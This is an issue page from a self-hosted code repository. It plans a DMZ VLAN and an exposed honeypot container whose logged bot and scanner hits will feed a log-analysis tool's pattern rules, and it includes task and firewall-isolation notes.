Circuit-Forge/turnstone
5
0
Fork 0
Code Issues 11 Pull requests 1 Projects Releases 6 Packages Wiki Activity Actions

DMZ + honeypot for bot pattern capture #58

New issue
Open
opened 2026-05-30 09:46:27 -07:00 by pyr0ball · 0 comments
pyr0ball commented 2026-05-30 09:46:27 -07:00
Owner
Copy link

Goal

Set up a DMZ VLAN and honeypot to capture inbound bot/scanner patterns for Turnstone log analysis.

Context

Router (Untangle/Arista at 10.1.10.13) now has IoT (VLAN 20) and Cameras (VLAN 30) VLANs active. Next step is to add a DMZ VLAN with a honeypot container that logs connection attempts — feeding those patterns back into Turnstone glean rules.

Tasks

  • Add DMZ VLAN (VLAN 40, 10.10.40.0/24) on the Untangle router
  • Deploy honeypot container (e.g. cowrie or opencanary) on Navi in the DMZ
  • Add port-forward rules to expose honeypot ports to WAN (22, 23, 80, 443, 3389)
  • Add Turnstone log source for honeypot container
  • Add glean patterns for honeypot hit events
  • Consider firewall rules to prevent DMZ from reaching main LAN

Notes

  • Untangle filter rules are default-allow for internal traffic — explicit block rules needed for DMZ→LAN
  • Use unifi-cli.sh for UniFi side if a DMZ WiFi SSID is needed
  • Untangle UI automatable via Playwright session (credentials in memory)
## Goal Set up a DMZ VLAN and honeypot to capture inbound bot/scanner patterns for Turnstone log analysis. ## Context Router (Untangle/Arista at 10.1.10.13) now has IoT (VLAN 20) and Cameras (VLAN 30) VLANs active. Next step is to add a DMZ VLAN with a honeypot container that logs connection attempts — feeding those patterns back into Turnstone glean rules. ## Tasks - [ ] Add DMZ VLAN (VLAN 40, 10.10.40.0/24) on the Untangle router - [ ] Deploy honeypot container (e.g. cowrie or opencanary) on Navi in the DMZ - [ ] Add port-forward rules to expose honeypot ports to WAN (22, 23, 80, 443, 3389) - [ ] Add Turnstone log source for honeypot container - [ ] Add glean patterns for honeypot hit events - [ ] Consider firewall rules to prevent DMZ from reaching main LAN ## Notes - Untangle filter rules are default-allow for internal traffic — explicit block rules needed for DMZ→LAN - Use `unifi-cli.sh` for UniFi side if a DMZ WiFi SSID is needed - Untangle UI automatable via Playwright session (credentials in memory)
pyr0ball added this to the v1.0 milestone 2026-06-01 15:10:01 -07:00
Sign in to join this conversation.
No Branch/Tag specified
Branches Tags
main
feat/42-50-postgres-multitenant
feat/32-domain-view
feat/15-hybrid-rag
feat/41-hybrid-bert-shim
feat/60-incidents-db
feat/pipeline-cleanup
feat/29-multi-agent-diagnose
feat/ssh-remote-glean
feat/live-watch
feat/llm-reasoning
feat/frictionless-capture
v0.7.0
v0.6.2
v0.6.1
v0.6.0
v0.5.0
v0.4.0
v0.3.0
v0.2.0
v0.1.0
Labels
Clear labels   
compliance

   
demo

   
deployment

   
docs

   
enhancement

   
parser

   
patterns

   
performance

   
security

   
ux
No labels
compliance
demo
deployment
docs
enhancement
parser
patterns
performance
security
ux
Milestone
Clear milestone
No items
No milestone
v1.0
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference: Circuit-Forge/turnstone#58
No description provided.
Delete branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?